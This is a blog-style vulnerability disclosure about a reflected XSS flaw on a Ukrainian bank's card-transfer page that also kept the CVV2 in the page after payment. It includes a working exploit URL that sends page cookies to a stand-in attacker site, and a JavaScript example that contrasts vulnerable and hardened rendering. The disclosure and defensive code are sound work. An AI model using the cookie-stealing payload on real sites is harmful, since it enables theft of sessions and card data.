If you are a new, ambitious, modern bank that wants to keep up with a rapidly changing technology landscape, then you should pay due attention to the security of your services. That attention also means following the requirements of the international payment systems you work with.
Unfortunately, not all banks understand this.
Once I needed to make an instant card-to-card transfer, and for that I decided to use the service of one of the Ukrainian banks, namely Fidobank.
After making the payment, I was redirected to a page like
pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712
I decided to check whether the value of the SenderTransID parameter, which is displayed on the page, is being filtered.
Naturally, as it turned out, it was not filtered, which made it possible to exploit an XSS vulnerability. I put together a URL which, when visited, sent all of the page's cookies to a fake, pseudo-malicious website, someveryverydangeroussite.com. The URL looked like this:
https://pay.fidobank.ua/TransCard/pay?SenderTransID=<form method=get name=a action=https://someveryverydangeroussite.com><input name=b></form><script>document.abvalue=document.cookie;alert(document.abvalue);document.a.submit();</script>
Clicking this link showed the following message:

That alone would be bad enough, but the developers also made exploitation easier: the CVV2 code stays in its input field on the page even after the payment has gone through, so any script running in the page can read it.
Oops:

Thus an attacker who contacts the victim and learns her card number can also obtain the card's CVV2 code, provided the victim made a transfer recently; only the expiry date is left to guess.
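To make the two problems above concrete, here is an added example of my own, not Fidobank's code: a minimal model of a page that reflects SenderTransID unescaped and re-renders the CVV2 entered for the payment, beside a hardened rendering that allow-lists the identifier, HTML-escapes anything reflected, and never writes the CVV2 back into the page. The HTML skeleton, the `escapeHtml` helper, the identifier format and the sample transaction record are assumptions; the payload is the one from the URL above, minus the host part.

```javascript
// Added example, not the bank's code. Models the reflection and the CVV2
// re-rendering described in the post; page layout and data are assumptions.

// Hypothetical transaction record as the server might keep it after payment.
// Constructed sample values.
const SAMPLE_TX = { id: "TS1421332314712", cvv2: "123" };

// The XSS payload from the post (query-string value only).
const PAYLOAD =
  '<form method=get name=a action=https://someveryverydangeroussite.com>' +
  '<input name=b></form><script>document.abvalue=document.cookie;' +
  'alert(document.abvalue);document.a.submit();</script>';

// Vulnerable rendering: SenderTransID is concatenated into the markup as-is,
// and the CVV2 entered for the payment is written back into the form field.
function renderPayPageVulnerable(senderTransId, tx) {
  return (
    '<p>Transaction: ' + senderTransId + '</p>' +
    '<form name="card"><input name="cvv2" value="' + (tx ? tx.cvv2 : '') + '"></form>'
  );
}

// HTML-escape a value for element content or a double-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened rendering: allow-list the identifier format (assumed: alphanumeric),
// escape on output as defence in depth, and never emit the CVV2 at all.
function renderPayPageHardened(senderTransId, tx) {
  const ID_FORMAT = /^[A-Za-z0-9]{1,32}$/;
  const shown = ID_FORMAT.test(senderTransId) ? senderTransId : 'invalid';
  return (
    '<p>Transaction: ' + escapeHtml(shown) + '</p>' +
    '<form name="card"><input name="cvv2" value=""></form>'
  );
}

// Two checks a reviewer can run over the rendered HTML.
function containsScript(html) { return /<script\b/i.test(html); }
function leaksCvv2(html, tx) { return html.includes('value="' + tx.cvv2 + '"'); }

const vuln = renderPayPageVulnerable(PAYLOAD, SAMPLE_TX);
const safe = renderPayPageHardened(PAYLOAD, SAMPLE_TX);
console.log('vulnerable page contains <script>:', containsScript(vuln)); // true
console.log('vulnerable page echoes CVV2:', leaksCvv2(vuln, SAMPLE_TX));  // true
console.log('hardened page contains <script>:', containsScript(safe));    // false
console.log('hardened page echoes CVV2:', leaksCvv2(safe, SAMPLE_TX));    // false
```

The allow-list does the real work here: a transaction identifier has a known shape, so anything else can be rejected outright instead of being escaped and shown. Escaping still belongs on every reflected value, because the next developer may drop the format check; and the CVV2 simply has no business being in the response, whatever the template does with it.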
Incidentally, this bank could not pass a PCI DSS assessment: storing CVV2 after authorization, in any form, even encrypted, is strictly prohibited by the standard and by the Visa and MasterCard rules.
Naturally, I wrote a letter to the security service, but apparently its staff were so busy collecting letters for fighting cybercrime that they did not find the time to respond to my letter and fix the vulnerability within two weeks.